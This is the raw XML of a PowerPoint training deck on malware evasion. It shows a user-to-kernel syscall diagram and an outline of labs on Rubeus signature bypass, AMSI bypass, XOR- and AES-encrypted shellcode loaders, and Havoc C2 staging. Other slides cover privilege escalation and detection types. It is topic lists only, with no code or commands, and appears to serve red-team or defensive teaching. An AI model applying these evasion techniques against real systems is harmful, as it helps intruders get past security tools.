                <a:latin typeface="-webkit-standard"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Down Arrow 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F70A02-2922-81CE-A73D-A6B26DA6D264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819108" y="2346499"/>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9" name="Down Arrow 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D3CE92-303E-BAB1-1739-EBD576B7269B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819106" y="3180437"/>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0" name="Down Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3914EC2F-571B-5F6B-639E-1EB40CE8EBF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819106" y="4163143"/>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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0817E414-A896-EE1A-5C23-DD7DB98AC9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556949" y="5567471"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="-webkit-standard"/>
              </a:rPr>
              <a:t>ntoskrnl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-webkit-standard"/>
              </a:rPr>
              <a:t>!NtAllocateVirtualMemory</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Down Arrow 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F99CCE2-3B73-3562-CF0C-AA43A4B34FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819107" y="5106084"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533DC6A2-E7DF-2770-A575-89B6A944014B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556948" y="1249011"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-BE" b="1"/>
              <a:t>PROCESS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAEB5054-6087-863F-EE26-3D97E6455D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3818234" y="1595088"/>
            <a:ext cx="444843" cy="355604"/>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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1AB09B7-5797-FC2E-DB65-0C3062A6128B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528224" y="5283886"/>
            <a:ext cx="3992281"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D6208908-C223-E085-2A65-0C1AEE999A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940158" y="5283886"/>
            <a:ext cx="2612930" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>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D114460D-4B75-370E-A9DE-D2DB5B02F5FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249436" y="4736752"/>
            <a:ext cx="1357231" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" b="1"/>
              <a:t>USERLAND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884B9B0C-8881-41BE-92ED-3881EDABF9EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584004" y="5489134"/>
            <a:ext cx="1026243" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-BE" b="1"/>
              <a:t>KERNEL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="613430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1134BB-017B-1A99-8375-99863AB681E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="135235"/>
            <a:ext cx="3693042" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 1 : Rubeus (Signature Bypass)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Yara</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- GoCheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Code + SDK (CL.exe / dotnet build)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC78AD0C-A4FB-AF7D-7657-3C4DFB3E5495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="1435399"/>
            <a:ext cx="3693042" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 2 : Powershell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- dotnet/clr explanation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Amsi explanation + Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8831B577-D982-09D6-506B-F0D718EC86E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="2444942"/>
            <a:ext cx="3693042" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 3 : Local Loader</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- petosc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t> shellcode generator / msfvenom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4EEBA1-C8A9-BB3C-0F6A-A58B6967680D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="3745106"/>
            <a:ext cx="3693042" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 4 : Local XOR Loader</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>XOR Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EBC59EE-E99D-9E5E-50D3-98385CE3F005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128437" y="2444941"/>
            <a:ext cx="3693042" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>trings.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>Dumbin IAT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>SystemInformer (RWX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>PeBear</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>API Monitor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52584EB2-862F-EB00-E7E0-50C89C20E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="4666993"/>
            <a:ext cx="3693042" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 5 : Remote AES Loader</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Staging</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252BABA1-CD34-7534-6188-BB3A735E2142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128437" y="4666993"/>
            <a:ext cx="3693042" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>.ico</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>lazysign</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51E6A70-4A28-DA7A-AF33-E2FEDF9447C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="3356634"/>
            <a:ext cx="1226618" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>DIALOGBOX PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3590BAC8-BFCF-1B2D-7160-EE58B42006B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="4201439"/>
            <a:ext cx="1226618" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>DIALOGBOX PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E793BAA9-A350-4DFD-8BE3-FD9439F09065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="5404076"/>
            <a:ext cx="1226618" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>DIALOGBOX PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8284E87E-7943-E26C-2C55-D649E367D78B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="5783411"/>
            <a:ext cx="3693042" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Lab 6 : HAVOC Remote AES Loader</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>SSL c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Amsi Bypass</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- dotnet-execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA061AA-99F8-4817-B900-19D51CCE981E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="6479227"/>
            <a:ext cx="1007007" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HAVOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t> PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829948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68932</TotalTime>
  <Words>1567</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>254</Paragraphs>
  <Slides>20</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-webkit-standard</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>C2 Archtitecture</vt:lpstr>
      <vt:lpstr>Generate shellcode (requires loader)</vt:lpstr>
      <vt:lpstr>Custom Local Shellcode Loader</vt:lpstr>
      <vt:lpstr>Most common initial access vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MSDN Functions needed</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Custom Remote Shellcode Loader</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Privilege escalation</vt:lpstr>
      <vt:lpstr>Privilege escalation</vt:lpstr>
      <vt:lpstr>Building a loader</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>STATIC / HEURISTICS / BEHAVIOUR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 Schoonaert</dc:creator>
  <cp:lastModifiedBy>Luk Schoonaert</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
